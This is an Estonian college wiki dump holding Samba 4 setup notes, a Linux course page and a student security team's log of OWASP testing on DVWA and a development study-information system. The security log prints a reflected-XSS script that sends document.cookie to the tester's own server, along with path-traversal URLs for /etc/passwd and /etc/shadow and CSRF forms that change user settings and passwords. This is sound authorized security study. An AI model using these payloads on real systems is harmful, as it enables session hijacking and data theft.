Samba 4 võimaluste rohke failiserver.
Suurimad omadused:
* 'Active Directory' sisselogimise ja administreerimise protokollide tugi Windows XP, Windows 7 ja Mac OS X klientidele.
* NTFS tugi
* Sisemine LDAP server AD omadustega.
* Sisemine Kerberos server.
* AD sidumine DNS-ga.
* Python tugi
ja palju muud.

=Eeldused=
Kasutusel on Ubuntu 11.04, millel on juba Bind9 paigaldatud domeeniga piix.ee. Kasutusele läheb Samba 4.0.0~alpha15~git20110124.

=Paigaldamine=
==Samba4 installeerimine==
Logida sisse administraatorina:
<source lang=bash>
sudo -i
</source>
Teha tarkvara nimekirja uuendamine:
<source lang=bash>
apt-get update
</source>
Installeerida Samba4 jaoks vajalikud paketid:
<source lang=bash>
apt-get install samba4 samba4-clients
</source>
Juhul kui eksisteerib vana Samba konfiguratsiooni fail, siis see kas kustutada või teha backupiks:
<source lang=bash>
mv /etc/samba/smb.conf{,.old}
</source>

==Bind9 konfiguratsiooni faili loomine==
Eeldab, et smb.conf faili pole olemas. <br>
Samuti tuleb jälgida järgnevas käsus, et --realm juures märgitud argumendiks SAMBA.PIIX.EE kõrval tuleb --domain argumendiks kirjutada SAMBA.<br>
PIIX või millegi muu korral ei hakka Kerberos tööle korralikult.<br>
--adminpass ehk administraatori parool peab olema vähemalt ühe suure tähega ja ühe numbriga ning vähemalt 7 tähemärki pikk.<br>
<source lang=bash>
LD_PRELOAD=/usr/lib/libdcerpc.so.0.0.1 /usr/share/samba/setup/provision --realm=SAMBA.PIIX.EE \
--domain=SAMBA --adminpass=Student1 --server-role='domain controller'
</source>
Tulemuse lõpuosa peaks olema midagi sarnast:
<source lang=bash>
...
See /var/lib/samba/private/named.conf for an example configuration include file for BIND
and /var/lib/samba/private/named.txt for further documentation required for secure DNS updates
A Kerberos configuration suitable for Samba 4 has been generated at /var/lib/samba/private/krb5.conf
Please install the phpLDAPadmin configuration located at /var/lib/samba/private/phpldapadmin-config.php into /etc/phpldapadmin/config.php
Once the above files are installed, your Samba4 server will be ready to use
Server Role: domain controller
Hostname: ns
NetBIOS Domain: SAMBA
DNS Domain: samba.piix.ee
DOMAIN SID: S-1-5-21-115115566-1439331126-697070417
Admin password: Student1
</source>

==Samba4 seonduvate skriptide muutmine ja loomine==
Kuna Samba4 ei kontrolli startimisel Samba kataloogi olemasolu /var/run kaustas, siis lisame selle võimaluse:
<source lang=bash>
nano /etc/init.d/samba4
</source>

Lisame koodile juurde SAMBAPID kontrollimise read "log_daemon_msg "Starting Samba 4 daemon" "samba" "alla:
<source lang=bash>
log_daemon_msg "Starting Samba 4 daemon" "samba"

#Lisatud juurde 3 rida
if [ ! -d $(dirname $SAMBAPID) ];
then mkdir -p $(dirname $SAMBAPID)
fi
</source>

Lisaks tuleb luua fail /usr/local/sbin/samba
<source lang=bash>
nano /usr/local/sbin/samba
</source>
Selle sisuks tuleb
<source lang=bash>
#!/bin/sh
LD_PRELOAD=/usr/lib/libdcerpc.0.0.1 /usr/sbin/$(basename $0)
</source>

Teeme eelnevale ka lingid
<source lang=bash>
ln -s /usr/local/sbin/samba{,_dnsupdate}
ln -s /usr/local/sbin/samba{,_spnupdate}
</source>

Samba 4 käivitamine
<source lang=bash>
service samba4 start
</source>

Zentyal SAMBA4

2013-01-07T21:18:18Z

Ulihten: /* Bind9 konfiguratsiooni faili loomine */

Autorid: Urmo Lihten A31 ja Kersti Lang A31 (2012 sügisemester)

=Sissejuhatus=
Samba 4 võimaluste rohke failiserver.
Suurimad omadused:
* 'Active Directory' sisselogimise ja administreerimise protokollide tugi Windows XP, Windows 7 ja Mac OS X klientidele.
* NTFS tugi
* Sisemine LDAP server AD omadustega.
* Sisemine Kerberos server.
* AD sidumine DNS-ga.
* Python tugi
ja palju muud.

=Eeldused=
Kasutusel on Ubuntu 11.04, millel on juba Bind9 paigaldatud domeeniga piix.ee. Kasutusele läheb Samba 4.0.0~alpha15~git20110124.

=Paigaldamine=
==Samba4 installeerimine==
Logida sisse administraatorina:
<source lang=bash>
sudo -i
</source>
Teha tarkvara nimekirja uuendamine:
<source lang=bash>
apt-get update
</source>
Installeerida Samba4 jaoks vajalikud paketid:
<source lang=bash>
apt-get install samba4 samba4-clients
</source>
Juhul kui eksisteerib vana Samba konfiguratsiooni fail, siis see kas kustutada või teha backupiks:
<source lang=bash>
mv /etc/samba/smb.conf{,.old}
</source>

==Bind9 konfiguratsiooni faili loomine==
Eeldab, et smb.conf faili pole olemas. <br>
Samuti tuleb jälgida järgnevas käsus, et --realm juures märgitud argumendiks SAMBA.PIIX.EE kõrval tuleb --domain argumendiks kirjutada SAMBA.<br>
PIIX või millegi muu korral ei hakka Kerberos tööle korralikult.<br>
--adminpass ehk administraatori parool peab olema vähemalt ühe suure tähega ja ühe numbriga ning vähemalt 7 tähemärki pikk.<br>
<source lang=bash>
LD_PRELOAD=/usr/lib/libdcerpc.so.0.0.1 /usr/share/samba/setup/provision --realm=SAMBA.PIIX.EE \
--domain=SAMBA --adminpass=Student1 --server-role='domain controller'
</source>
Tulemuse lõpuosa peaks olema midagi sarnast:
<source lang=bash>
...
See /var/lib/samba/private/named.conf for an example configuration include file for BIND
and /var/lib/samba/private/named.txt for further documentation required for secure DNS updates
A Kerberos configuration suitable for Samba 4 has been generated at /var/lib/samba/private/krb5.conf
Please install the phpLDAPadmin configuration located at /var/lib/samba/private/phpldapadmin-config.php into /etc/phpldapadmin/config.php
Once the above files are installed, your Samba4 server will be ready to use
Server Role: domain controller
Hostname: ns
NetBIOS Domain: SAMBA
DNS Domain: samba.piix.ee
DOMAIN SID: S-1-5-21-115115566-1439331126-697070417
Admin password: Student1
</source>

==Samba4 startimise skripti muutmine==
Kuna Samba4 ei kontrolli samba kataloogi olemasolu

Zentyal SAMBA4

2013-01-07T21:15:13Z

Ulihten:

Zentyal SAMBA4

2013-01-03T09:29:26Z

Ulihten:

=Sissejuhatus=
Samba 4 võimaluste rohke failiserver.
Suurimad omadused:
* 'Active Directory' sisselogimise ja administreerimise protokollide tugi Windows XP, Windows 7 ja Mac OS X klientidele.
* NTFS tugi
* Sisemine LDAP server AD omadustega.
* Sisemine Kerberos server.
* AD sidumine DNS-ga.
* Python tugi
ja palju muud.

Zentyal SAMBA4

2013-01-03T09:27:42Z

Ulihten:

=Sissejuhatus=
Samba 4 võimaluste rohke failiserver.
Suurimad omadused:
* 'Active Directory' sisselogimise ja administreerimise protokollide tugi Windows XP, Windows 7, Windows 8 ja Mac OS X klientidele.
* NTFS tugi
* Sisemine LDAP server AD omadustega.
* Sisemine Kerberos server.
* AD sidumine DNS-ga.
* Python tugi
ja palju muud.

Linuxi administreerimine

2012-12-06T12:06:06Z

Ulihten: /* Esseede teemad 2012 */

=Üldinfo=
ECTS: 4
Hindamisviis: Eksam

==Õppejõud==
Margus Ernits

Katrin Loodus

=Eeldused ja sihtgrupp=

Operatsioonisüsteemide administreerimine ja sidumine (Rangelt soovituslik). Osadmin aines loetava oskamine on antud aine õppimise eelduseks. ÕISis on see eeldus märgitud soovituslikuks, kuna igal aastal on paar inimest, kes suudavad mõlemad ained korraga läbida ja on antud vallas väga pädevad.
Linuxi administraatori kursus on mõeldud tugeva infotehnoloogilise põhjaga arvuti-spetsialistile.
Kursuse rõhk on eelkõige võrguhalduril, kelle tööülesannete hulka kuulub igapäevane serverite, võrgu jms hooldus, konfigureerimine ja uute seadmete installatsioon.

=Eesmärk ja sisu=

Kursuse esimeses osas õpitakse tundma Linux süsteemi toimimist, antakse ülevaade administreerimistoimingute automatiseerimisest shelli skriptide abil ja omandatakse praktiline käsufailide koostamise kogemus.

Teises osas õpitakse paigaldama ja konfigureerima erinevaid võrguteenuseid. Kursuse teise osa alguses korratakse taseme ühtlustamiseks TCP/IP võrgu põhialuseid.

=Õpiväljundid=

=Loengud=
1. Sissejuhatav loeng eeldustest [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/Loeng_1_Sissejuhatus.odp Sissejuhatus]

2. Kordamine Osadmin [http://elab.itcollege.ee:8000/Linux-Basics.mm]

=Praktikumid=

==Esimene praktikum - Ubuntu Server paigaldamine ja kordamistest==
* Paigaldage Ubuntu Linux Server süsteem VirtualBox abil
**RAM 512MB
**HDD dynamicly allocated 8GB
**2 Võrgukaarti NIC1 - NAT (eth0 - Ubuntus) ja NIC2 - HostOnly (eth1 - Ubuntus)
**Logige serverisse sisse ja seadistage võrk failis /etc/network/interfaces (liidese eth1 ip aadress 192.168.56.200).
***Abiinfo [[Ubuntu server võrgu seadistamine]] ja [[VirtualBoxi võrgud]]

<source lang="bash">
auto eth1
iface eth1 inet static
address 192.168.56.200
netmask 255.255.255.0
</source>

*Paigaldage openssh server, kui te seda installi käigus ei teinud (apt-get update && apt-get install ssh)

Ubuntu Server 12.04.1 LTS ISO (64bit) http://elab.itcollege.ee:8000/ubuntu-12.04.1-server-amd64.iso

Eelduste kontrollimise test: http://goo.gl/73xBZ
Kes tunneb, et test on liiga keeruline, peab kaaluma aine deklareerimise asemel Osadmin aine (mis on soovituslik eeldus) läbimist.

==Teine praktikum==
*Desktop linux paigaldamine (Vali mitte deb pakihalduriga linux distro, näiteks fedora http://elab.itcollege.ee:8000/Fedora-17-x86_64-Live-Desktop.iso )
*Võib paigaldada ka Ubuntu Desktopi, kuid siis tuleb lisada rpm baasil server

*Memory 1024MB
*HDD 16GB (või 8GB) Dynamic disk
*Network
**NIC1 - eth0 - NAT
**NIC2 - eth1 - Host only - Seate ise aadressi 192.168.56.201
**Video Memory 64MB 3D acceleration sisse

===Praks 2 Ülesanne===
Teha key based autentimisega serverisse sisenemine. (tööjaamast saab serveris käske käivitada)

===Praks 3 kodutöö===
Teha apt - yum ja dpkg - rpm vastavustabel. dpkg ja apt korraldused leiab [http://elab.itcollege.ee:8000/Linux-Basics.mm Linux-Basics mindmapist]

Parim töö annab 7p, järgmised 5p (piisavalt põhjalikud ja erinevad)

Ebapiisavad vastavustabelid, mis sarnanevad üksteisele punkte ei saa.

Kui su tabel on ilma vigadeta, kuid mitte parimate sead siis saad 1-2p.

===Praks 4===

Nimeserveri BIND9 paigaldamine.

*Mõtle välja domeenimini
*Paigalda nimeserver bind9
*Seadista oma domeen
**www.domeen
**ns.domeen
**sales.domeen
**seadista oma kliendimasin kasutama uut nimeserverit

NB: enne kaitsmist lugeda läbi http://kuutorvaja.eenet.ee/wiki/DNS

Labori üks näide [[Nimeserveri seadistamine BIND9 näitel]]

Praktikumi salvestus http://echo360.e-uni.ee/ess/echo/presentation/a828b6af-8caf-4319-b594-5d6bfed04a70

===Praks 5===

Veebiserveri apache2 paigaldamine

*Loo veebisaidid www.domeen ja sales.domeen (ehk oma DNS labori nimedele vastavad veebisaidid)
*Seadist HTTPS nendele saitidele (vajadusel loo uus ip alias ja muuda nimeserveris olevat kirjet, et TLS nimed viitaks erinevatele IP aadressidele)
*Abiks on loeng: http://enos.itcollege.ee/~mernits/infrastruktuur/loeng04%20-%20Veebiserver.odp ja labor: https://wiki.itcollege.ee/index.php/Veebiserveri_labor_v.2
*Paigalda WordPress vastavalt juhendile: http://goo.gl/6XQ0U

Praktikumi salvestus: http://echo360.e-uni.ee/ess/echo/presentation/0945a764-0305-48ec-8082-4e57a23cc536

=Labor 1=
*Veebiserver ja virtualhostid
*DNS
*e-post
*iptables

=Labor 2=
*LDAP või Samba4 - LDAP Teet Saar, Kullo-Kalev Aru
*Puppet või chef
*PAM
*Samba - Kristo Kapten
*[[TLS termineerimine nginx abil]] - Sander Arnus, Sander Saveli

=Esseede teemad 2012=

Võib valida keerulisemaid teemasid ka [[Osadmin referaadi teemad]] lehelt.

[[zsh]] - pole algajale

Mida uurida

Prompt

http://zshwiki.org/home/config/prompt

http://stevelosh.com/blog/2010/02/my-extravagant-zsh-prompt/

.zshrc

for

if --- Kallas (A32)

while ---

jne

[[CentOS Server]] --- teeb Oliver Naaris

Paigaldamine

Teenuste DNS, apache2, samba, e-post seadistamine

[[Oracle Linux]]

Paigaldamine

Teenuste DNS, apache2, samba, e-post seadistamine

[[Suse Linux]]

Paigaldamine

Teenuste DNS, apache2, samba, e-post seadistamine

[[OpenLDAP Ubuntu Serveril]] - teeb Tarmo Suurmägi

[[Zentyal SAMBA4]] --- Lang & Lihten A31

Samba4 domeenikontrolleri seadistamine ja ubuntu/fedora/muu süsteem autentimise seadistamine kasutades uusi vahendeid

[[Apt-yum/dpkg-rpm käskude lühivõrdlus]] - Valmis retsenseerimiseks, Teet Saar A32

[[Ophcrack]] - teeb Kristo Kapten

While

2012-11-19T13:27:02Z

Ulihten: /* While */

====While====
Under construction by Lang&Lihten!

While

2012-11-19T13:26:32Z

Ulihten: Created page with '====While===='

====While====

Security team

2012-03-30T21:16:52Z

Ulihten: /* Burpsuite v1.4 */

== 1. päev - Materjalidega tutvumine ==

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

::A1: Injection - Urmo
::A2: Cross-Site Scripting (XSS) - Alo
::A3: Broken Authentication and Session Management - Sander
::A4: Insecure Direct Object References - Alo
::A5: Cross-Site Request Forgery (CSRF) - Taavi
::A6: Security Misconfiguration - Matis
::A7: Insecure Cryptographic Storage - Matis
::A8: Failure to Restrict URL Access - Urmo
::A9: Insufficient Transport Layer Protection - Taavi
::A10: Unvalidated Redirects and Forwards - Sander

Sanderi konspekt: [[Media:Ois_materjal.pdf]] <br>
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]] <br>
Taavi esitlus [[Media:A9.pdf]] <br>
Taavi esitlus [[Media:A5.pdf]] <br>
Matise esitlus [[Media:Insecure Cryptographic Storage.pdf]] <br>
Matise esitlus [[Media:Security Misconfiguration.pdf]] <br>
Alo Esitlus: [[Media:Cross-site_scripting_(XSS).ppt]] <br>

== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==
===Security Team tegevusplaan===
1. Päev
:1.1 Tutvuda OWASP’iga.
:1.2 Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.
:1.3 Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.
2. Päev
:2.1 Esitada tiimi tegevusplaan.
:2.2 Tutvuda turvariskidega natuke põhjalikumalt.
:2.3 Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.
:2.4 Täiendada esimese päeva ettekannet.
3. Päev
:3.1 Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.
:3.2 Saadud tulemuste dokumenteerimine.
4. Päev
:4.1 Saadud tulemuste esitlemine ettekandega
5. Päev
:5.1 Tulemuste parandamine wiki’s.

=== Alo tegevus ===
==== Acunetix Web Vulnerability Scanner v. 8 automaatskännimise tööriistaga tutvumine ====
http://www.acunetix.com/support/vulnerability-checks.htm
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting
http://www.youtube.com/watch?v=SG1cvGQ971g
http://www.isecom.org/research.html
http://evuln.com/tools/
http://sectools.org/tag/web-scanners/
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/
http://www.acunetix.com/vulnerability-scanner/getting-started.htm

Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:
Acunetix Web Vulnerability Scanner v. 8
http://www.acunetix.com/vulnerability-scanner/

Pärast programmi installimist tuli seadistada skännimine, valisime keskmise põhjalikkusega skänni.

Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.

Antud programm võimaldab skännida:
:Cross-Site Scripting (XSS)
:SQL Injection (blind test)
:File inclusion
:Code Execution
:LDAP Injection
:Cross Frame Scripting
:SQL Injection (error msg. test)
:CRLF Injection
:Directory Travelsal
:XPath Injection
:URL Redirection
:Application Error Message

Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.

=== Urmo tegevus ===

Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.

Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application'i.

==== Brute Force (DVWA) ====
Käsitsi välja uuritud login andmed:
kasutajanimi: admin
parool: password

===== Fireforce plugin Firefoxis =====
Tekitatud sai ka password list faili pass.txt.

Kasutusel oli Firefox brauser, kuhu installisime plugin'a Fireforce.
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .

Panime kasutajanimeks "admin" ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.

Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud.
Selleks sai sõna "incorrect".

Määrata ära tuli ka, et mitu päringut sekundis tehakse.

Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada.

Päringute tegemise kiirus vähem kui 1 päring/sekundis.

Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.

Kasutasime ka videos näidatud "@ DICTIONARY" teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.

Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.

===== Burpsuite v1.4 =====
Burpsuite v1.4 on Samurai WTF'il olemas juba sees ja saab kohe käima panna.
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI'st]]

Programm on juba loomult keerulisem.

Burpsuite'iga tuleb panna käima proxy server localhost'is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.

Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine.
Läbi proxy serveri tuleb BurpSuite'ile kohale vastava veebilehe Header sisselogimise kohta.

Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.
Payload'i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.

Ründe stiiliks määrata Pitchfork.
Seejärel mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.

Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.

Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -> Start Attack, mis siis alustas rünnet.

Kahjuks ka see rünne ei toiminud ja ei suudetud parooli välja tuua.
Proovitud sai ka lühemate nimekirjadega aga edutult.

Peale teise programmi kasutamist jõudsime järeldustele, et Pitchfork meetod kasutab tegelikult meetodit, kus ta paaritab mõlema nimekirja kirja peale järjekorras samadel kohtadel sõnad, millest polnud kasu. Oleks pidanud kasutama ClusterBomb viisi aga meil jäi ajanappuse tõttu kasutamata.
Samuti Brute Force ründeviisist polnud meil tegelikult kasu ja ei aita eesmärki täita effektiivselt ÕISi arendustestimisel.

Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5 sekundiks sisselogimine ära vastava teatega.

Lisaks Brute force programmidele ei tule sealt vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.

Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.

==== CSRF - Cross-site request forgery ====
Katsetamine toimub koos Taaviga.

Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.

Katse eesmärgiks on DVWA-s kasutaja parooli muutmine.

Rünnatav inimene ise paneb meie tehtud veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse sealt info koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.

Lõime uue faili - crosssite.txt

DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.

Võtsime lehe Source Code lahti

Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.

Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.

Current Password lahtri jätsime samaks.

Ülejäänud kahe uue passwordi fieldi type'iks määrasime "Hidden" ja value'deks "admin".

Salvestasime faili ja käivitasime selle.

Tuli ette ainult lahter Current Passwordi ja Submit nupuga.

Panime sisse tolle hetke parooli ning saatsime teele päringu.

Seejärel saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud väärtus.

Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.

=== Taavi tegevus ===

Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.

=== Matise tegevus ===
==== Reflected Cross Site Scripting (XSS) ====
<ul>
<li>Lehel on selline Form:</li>
[[Image:Xsstesting.jpg|Location="left"|Caption|]]
<br>Form väljastab : Hello „sisestatud nimi“
<li>Easy puhul:</li>
<li>Saab sisestada textboxi skripti:</li>
<script>
alert(document.cookie.match(/PHPSESSID=[^;\]+/));
</script>
<li>Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.</li>
<li>Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: </li>
<script>
this.document.location.href = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);
</script>
<li>Saab kohe enda veebiserveri logidest näha Session ID’d.
<br>Näide logist:</li>
/var/log/apache2/access.log
127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] "GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1" 404 404 "-" <br> "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11"
<li>Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.</li>
</ul>

=== Sanderi tegevus ===
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]

SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).
==== Faili üleslaadimine: madal tase ====
<ul>
<li><b>DVWA Security</b> määrata: Low -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess</li>
Üleslaetavasse *.php faili saab kirjutada php koodi:
<?php var_dump($_REQUEST, $_SERVER); ?>
<li>Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:</li>
esimeses massiivis "PHPSESSID" ("2b1ae19446cfde009664f18df51b6ec1") ja turvatase "security" ("low");
teises "HTTP_COOKIE", milles on eelnevadki andmed; asukoht "PATH", "SERVER_SOFTWARE", "SERVER_NAME",
"SERVER_ADDR" ("127.42.84.1"), "SERVER_PORT" ("80"), "REMOTE_ADDR" ("127.42.84.1"), "REMOTE_PORT" ("53425") jpm.
</ul>

==== Faili üleslaadimine: keskmine tase ====
<ul>
<li><b>DVWA Security</b> määrata: Medium -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida ei saa näiteks järgnevates formaatides faile:</li>
.htaccess
.php .html .pdf
.gif .png .bmp
.svg .swf
.tif .tiff .exif
.raw .cgm
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
<li>Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:</li>
http://dvwa/hackable/uploads/*.jpg
<li>Skripti käivitamiseks tuleb kasutada "?page=" ja faili asukoht:</li>
http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg
Kuvatakse php skripti tulemus.
Kommentaar: "?page=" kasutamine võetud menüüvalikust: <b>File Inclusion</b>
<li>"?page=" abil saab vaadata kasutajate nimesid:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd
<li>Paroole vaadata ei saa, selleks õigused puuduvad:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow
</ul>

==== Faili üleslaadimine: kõrge tase ====
<ul>
<li><b>DVWA Security</b> määrata: High -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.</li>
<li>Skripti käivitamiseks ei piisa ka "?page=" kasutamisest. Igal juhul on vastus selline:</li>
ERROR: File not found!
<li>Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:</li>
http://www.motobit.com/util/base64-decoder-encoder.asp
<li>Moodustades loodud faili asukohast kood ja kasutades</li>
data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:
http://dvwa/hackable/uploads/*.jpg
</ul>

== 3. päev - Dev-ÕIS'i turvatestimine==

=== Alo tegevus ===
[[File:PDFHinneteleht.png|200px|thumb|right|Näide hinnetelehest]]
Kui testisime failide uploadimis võimalusi tuli idee testida ka failide allalaadimist.<br>
Faile saab alla laadida enda profiili all õppesooritustes.<br>
Seal on võimalik alla laadida nii .pdf kui ka .odt formaadis õppesooritusi.<br>
Allalaadimis Urli muutmisega oli võimalik alla laadida teiste kasutajate õpitulemusi.<br>
Õpitulemused sisaldasid lisaks tulemustele ka inimese isikukoodi.<br>
Kui oleks soovinud õpitulemusi alla laadida kindla kasutaja õpitulemusi oleks saanud õpilase id kätte tema profiili pildi id kaudu.<br>
Kuna see oli tõsine turvaauk ja õpilaste andmed on konfidentsiaalsed täiendati url accessi nii, et enam üks õpilane teise inimese andmetele ligi ei pääseks.<br>

=== Urmo tegevus ===
====Subgraph Vega ====
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.
Programm on Java põhine graafilise liidesega ja töötab Linux'i, OS X ja Windowsi peal.

[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.

Alustasime uut skänni (Start New Scan).
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.

Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised.

Me lisasime ainult küpsise (cookie) sisu:
<pre>
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221
</pre>
ning Finish.

[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).

Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000.

Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script'ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body nõrkust.

Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID'sid ja parameetreid ära oma pealkirjades.
Õnneks parameetritega väljad olid veebilehel korralikult ära escape'itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.

ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.

==== Wapiti ====
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti.
(Koduleht: http://wapiti.sourceforge.net/)

Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS'iga midagi teha.

==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====
=====1. katse - ÕISi keskkkonna keelevahetus =====
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]

Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.

Võtsime dev-ÕIS'i Source Code'ist välja vastava formi osa ja panime eraldi html faili.
Koristasime mittevajaliku disaini koodi juurest ära.
Muutsime form'i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks "en" ehk inglise keelne keskkond tekiks.
Panime koodi enose veebiserverisse üles nimega ois.html.

Faili sisu:
<source lang="html4strict">
<form id="settingsForm" method="post" action="https://itcollege.dev.ois.ee/setting/edit?user_id=2198"
enctype="application/x-www-form-urlencoded">
<input type="hidden" AUTOCOMPLETE="off" name="default_language"value="en">
<br>
<input type="submit" value="Salvesta seaded" name="Savesettings">
</form>
</source>
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.

Katsetas koodi enda konto peal Taavi.

=====2. katse - ÕIS'i kasutaja parooli muutmine =====

